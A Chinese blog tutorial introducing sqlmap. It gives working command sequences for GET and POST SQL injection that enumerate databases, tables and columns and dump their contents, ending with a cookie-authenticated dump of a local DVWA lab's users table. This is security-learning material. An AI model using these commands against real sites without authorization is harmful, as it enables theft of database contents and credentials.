sqlmap入门使用

已于 2022-02-06 10:44:52 修改
阅读量1.6k 收藏
点赞数
分类专栏: 网络空间安全 文章标签: python web安全
于 2022-01-20 15:41:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38720471/article/details/122602853
版权

1get型注入

1.1检查注入点

python sqlmap.py -u "xxxx网站"

1.2查看数据库

python sqlmap.py -u "xxxx网站" --dbs

1.3查看数据库中的表

python sqlmap.py -u "xxxx网站" -D 数据库名 --tables

1.4查看数据库中的表的列

python sqlmap.py -u "xxxx网站" -D 数据库名 -T 表名 --columns

1.5查看数据库中的表中所有内容

python sqlmap.py -u "xxxx网站" -D 数据库名 -T 表名 --columns --dump

2post型注入

2.1首先需要拦截包,然后以txt的形式保存到sqlmap路径下
2.2查看数据库中的表中所有内容

python sqlmap.py -r 文件名字.txt -D 数据库名 -T 表名 --columns --dump

tips:
1:post和get型注入在sqlmap中的使用只在于 get中是 -u “url” 而post是 -r 文件名.txt
2:-p 传输的参数名 可以指定本次注入参数

补充

带有登录凭证的页面是需要登录凭证的,所以使用sqlmap时也要带上登录凭证。

网页F12查看,点击存储
在这里插入图片描述

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"   --cookie="PHPSESSID=84nrp5ikbuiv4dte1hi2ggjbd6;security=low" -D dvwa -T users --columns --dump
逆流!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap入门
weixin_47493074的博客
09-04 207
sqlmap查找SQL注入漏洞入门
sqlmap扫描信息保存到txt文档
weixin_35752122的博客
01-04 777
如果你想使用 sqlmap 将扫描信息保存到文本文档,你可以使用下面的命令: sqlmap --log-file scan-results.txt -u http://example.com/query?id=1 这会将 sqlmap 的扫描日志保存到名为 "scan-results.txt" 的文本文档中。你可以替换 "http://example.com/query?id=1" 为你想要扫描...
kali sqlmap 默认扫描数据的保存路径
m0_61867082的博客
06-04 1199
/root/.local/share/sqlmap/output/
SQL注入工具介绍——sqlmap
p36273的博客
08-01 1819
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆叠查询注入,可以同时执行多条语句的执行时的注入。
sqlmap工具说明
tlucky的博客
03-06 1632
版本:v1.4.10支持环境:windows,linux等支持语言:python设计目的:可自动执行SQL注入缺陷的检测和开发过程,并接管数据库服务器实现:有强大的检测引擎,针对不同类型的数据库提供多样的渗透测试功能选项,实现数据库识别、数 据获取、访问DBMS\操作系统甚至通过带外数据连接的方式执行操作系统的命令。,以及从数据 库指纹识别、从数据库获取数据、访问底层文件的广泛范围的交换机通过带外连接在操作系统上 执行命令。
sqlmap工具的使用 (超详细附工具版)
读书 买花 长大
06-11 3090
sqlmap
sqlmap命令大全(附详细扫描流程)
m0_50818626的博客
05-24 7210
3.扫描指定数据库中的所有表名,-D可以指定要扫描的数据库,这里我扫的是security库。红框内就是我们所扫描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.扫描users中的字段名是什么,-T可以指定扫描的表。上图红框内就是security库中的所有表啦。可以看到有漏洞,布尔盲注和时间盲注。可以看到所有的数据库都被扫描出来了。5.用dump扫描出字段中的所有数据。2.扫描所有数据库 -dbs。
sqlmap中文手册.pdf
08-13
sqlmap中文版的使用,仅供学习研究使用.用户手册 介绍——介绍 sqlmap 技术——sqlmap 支持的 SQL 注入技术 特性——支持的特性列表 下载更新——更新你的 sqlmap 副本 相关依赖——关于第三方库和工具的信息 历史...
SqlMap入门指南-思维导图.png
04-25
SqlMap入门指南.png
ibatis-sqlMap-入门教程(代码)
10-22
【标题】"ibatis-sqlMap-入门教程(代码)" 涉及的知识点主要集中在使用MyBatis(原iBATIS)框架进行数据库操作的初步实践上。MyBatis是一个优秀的持久层框架,它支持定制化SQL、存储过程以及高级映射,避免了几乎...
sqlmap手册-中文版.pdf
07-30
sqlmap
sqlmap.pdf
07-16
sqlmap注入工具实例。它是一个很好的WEB工具主要工作在linux系统下。
sqlmap学习笔记:常用命令
ElsonHY的博客
12-08 1035
文章目录前言0x01 使用环境0x02 判断注入点0x03 常用命令1.查询当前数据库2.查询所有数据库3.爆表名4.爆字段名5.脱库6.获取数据库用户密码(加爆破)0x04 总结 前言 sqlmap可以说是sql自动化注入工具的不二之选了,通常sql注入的过程中,也没有人绝对地只用手注或者自动化注入,通常是根据实际情况两者配合使用,这篇文章以POST类型注入为例子,示范sqlmap常用命令的使用方法。 0x01 使用环境 测试网页:sqli-labs的第11关。 操作系统:kali(由于win环境
使用sqlmap + burpsuite sql工具注入拿flag
太阳照耀我走四方
02-13 1681
简单的渗透工具sqlmap使用
我的SQLmap使用方法(详解)
weixin_41182861的博客
05-12 4271
SQLMAP是一个由Python语言编写的开源渗透测试工具,它主要用来检测sql注入漏洞(sql盲注、union查询、显错注入、延迟注入、post注入、cookie注入等),是一款功能强大的sql漏洞检测利用工具。sqlmap可以检测的数据库有:access、mssql、mysql、oracle、postgresql、db2、sqlite等。其他功能:执行命令、列举用户、检测权限、自动破解、数据导出等功能。...
sqlmap默认输出路径的设置
热门推荐
YQ的博客
04-10 1万+
SQLMap的默认输出路径是在 C:/Users/用户名/.sqlmap/output/下的。 但是刚安装完sqlmap后C:/Users/用户名/ 文件下是不存在.sqlmap这个文件夹的,需要使用sqlmap扫描一下网站,程序才会建立该文件夹。 设置sqlmap的默认输出路径很简单,执行如下命令: 在--output-dir后面输入想要导出的文件路径。 这样程序执行之后就
Sqlmap详解使用
白白白
09-03 5888
转载自https://www.anquanke.com/post/id/235846 作者:谢公子 感谢作者,内容非常详细。 Sqlmap sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等 Sqlmap采用了以下5种独特的SQL注入技术 基于布尔类型的盲注,即可
cv2读取和保存图片
最新发布
m0_53291740的博客
07-12 187
cv2.imwrite('b\\img1.png',img)#b存在就可以保存进去。如果b存在,c不存在,程序不会报错,也不会保存图片。如果目录b不存在就会存到当前文件夹。
sqlmap使用教程
09-13
关于sqlmap使用教程,以下是一些基本的指导步骤: ...这只是一个简单的入门指南,sqlmap还有很多其他高级功能和选项。请记住,在进行任何安全测试之前,确保你已经获得相关授权,并且在合法和道德的框架内进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值